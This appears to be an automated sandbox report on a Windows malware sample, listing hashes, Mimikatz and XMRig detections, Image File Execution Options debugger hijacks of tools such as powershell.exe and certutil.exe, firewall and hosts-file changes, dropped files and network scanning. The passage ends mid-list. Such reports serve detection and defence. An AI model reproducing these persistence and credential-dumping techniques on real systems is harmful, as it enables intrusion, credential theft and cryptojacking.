Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2024 12:33
Behavioral task
behavioral1
Sample
8e065bda3d6123b22bdd0e98724a1480N.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
8e065bda3d6123b22bdd0e98724a1480N.exe
Resource
win10v2004-20240802-en
General
-
Target
8e065bda3d6123b22bdd0e98724a1480N.exe
-
Size
8.9MB
-
MD5
8e065bda3d6123b22bdd0e98724a1480
-
SHA1
96b3032bed31c798f7502f890fa746df4e46ec8b
-
SHA256
fd50d4adffef53d86264cf912253da4cd8590855355a63d40e1c4ac91b90a2c2
-
SHA512
a8b4ed66e5e5806f14599aebc3edf71a998beaa5ce6e2ce606b36feabe9bdbfd8a6ec262449083eefbe83efa1507d6cb15d22d3a7d445e235c23572733d532c6
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1076 created 2172 1076 emzriir.exe 38 -
Contacts a large (15345) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/4644-181-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-193-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-202-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-211-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-221-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-229-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-243-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-260-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig behavioral2/memory/4644-261-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3044-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3044-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00080000000234c1-6.dat mimikatz behavioral2/memory/2376-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/468-137-0x00007FF6D2990000-0x00007FF6D2A7E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts emzriir.exe File opened for modification C:\Windows\system32\drivers\etc\hosts emzriir.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe emzriir.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" emzriir.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4176 netsh.exe 2460 netsh.exe -
Executes dropped EXE 25 IoCs
pid Process 2376 emzriir.exe 1076 emzriir.exe 2504 wpcap.exe 2960 nnbuyeerm.exe 468 vfshost.exe 4660 zhcbccpzr.exe 3592 xohudmc.exe 1064 xchlyg.exe 4644 bnidgq.exe 856 zhcbccpzr.exe 732 zhcbccpzr.exe 1132 zhcbccpzr.exe 2636 zhcbccpzr.exe 696 zhcbccpzr.exe 3692 zhcbccpzr.exe 1788 zhcbccpzr.exe 3444 zhcbccpzr.exe 2680 zhcbccpzr.exe 1436 zhcbccpzr.exe 4684 zhcbccpzr.exe 3384 zhcbccpzr.exe 2536 zhcbccpzr.exe 2396 zhcbccpzr.exe 2916 emzriir.exe 1896 bbqlvcqnq.exe -
Loads dropped DLL 12 IoCs
pid Process 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2504 wpcap.exe 2960 nnbuyeerm.exe 2960 nnbuyeerm.exe 2960 nnbuyeerm.exe -
resource yara_rule behavioral2/files/0x0007000000023505-134.dat upx behavioral2/memory/468-136-0x00007FF6D2990000-0x00007FF6D2A7E000-memory.dmp upx behavioral2/memory/468-137-0x00007FF6D2990000-0x00007FF6D2A7E000-memory.dmp upx behavioral2/files/0x000700000002350f-140.dat upx behavioral2/memory/4660-141-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4660-149-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/files/0x000700000002350d-162.dat upx behavioral2/memory/4644-164-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/856-170-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/732-174-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/1132-178-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-181-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/2636-183-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/696-187-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/3692-191-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-193-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/1788-196-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/3444-200-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-202-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/2680-205-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/1436-209-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-211-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/4684-214-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/3384-218-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-221-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/2536-223-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/2396-227-0x00007FF7A3370000-0x00007FF7A33CB000-memory.dmp upx behavioral2/memory/4644-229-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/4644-243-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/4644-260-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx behavioral2/memory/4644-261-0x00007FF7A6200000-0x00007FF7A6320000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ifconfig.me 45 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData emzriir.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\xchlyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2DEAA270F2A3ADDABB8505E3C5BD28E8 emzriir.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content emzriir.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\xchlyg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2DEAA270F2A3ADDABB8505E3C5BD28E8 emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft emzriir.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 emzriir.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\kgkufnrnc\UnattendGC\specials\ssleay32.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\tibe-2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\ucl.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\docmicfg.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\svschost.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\scan.bat emzriir.exe File created C:\Windows\znrgncrv\emzriir.exe 8e065bda3d6123b22bdd0e98724a1480N.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\crli-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\exma-1.dll emzriir.exe File created C:\Windows\znrgncrv\docmicfg.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\svschost.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\trfo-2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\svschost.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\AppCapture32.dll emzriir.exe File created C:\Windows\kgkufnrnc\Corporate\mimilib.dll emzriir.exe File opened for modification C:\Windows\kgkufnrnc\uhbggiaeb\Packet.dll emzriir.exe File opened for modification C:\Windows\znrgncrv\vimpcsvc.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\docmicfg.xml emzriir.exe File created C:\Windows\kgkufnrnc\Corporate\mimidrv.sys emzriir.exe File created C:\Windows\znrgncrv\svschost.xml emzriir.exe File created C:\Windows\znrgncrv\spoolsrv.xml emzriir.exe File opened for modification C:\Windows\kgkufnrnc\Corporate\log.txt cmd.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.exe emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\wpcap.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\cnli-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\spoolsrv.xml emzriir.exe File opened for modification C:\Windows\znrgncrv\spoolsrv.xml emzriir.exe File created C:\Windows\kgkufnrnc\upbdrjv\swrpwe.exe emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\nnbuyeerm.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\coli-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\trch-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\spoolsrv.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\Packet.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\libxml2.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\svschost.xml emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\bbqlvcqnq.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\schoedcl.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\posh-0.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\AppCapture64.dll emzriir.exe File opened for modification C:\Windows\kgkufnrnc\uhbggiaeb\Result.txt bbqlvcqnq.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\zlib1.dll emzriir.exe File created C:\Windows\znrgncrv\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\libeay32.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\tucl-1.dll emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\spoolsrv.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\schoedcl.xml emzriir.exe File created C:\Windows\kgkufnrnc\Corporate\vfshost.exe emzriir.exe File created C:\Windows\kgkufnrnc\uhbggiaeb\ip.txt emzriir.exe File opened for modification C:\Windows\znrgncrv\emzriir.exe 8e065bda3d6123b22bdd0e98724a1480N.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\xdvl-0.dll emzriir.exe File created C:\Windows\znrgncrv\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\Shellcode.ini emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\vimpcsvc.exe emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\vimpcsvc.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\docmicfg.xml emzriir.exe File created C:\Windows\kgkufnrnc\UnattendGC\specials\docmicfg.xml emzriir.exe File created C:\Windows\ime\emzriir.exe emzriir.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4276 sc.exe 4608 sc.exe 3064 sc.exe 3500 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language emzriir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language emzriir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 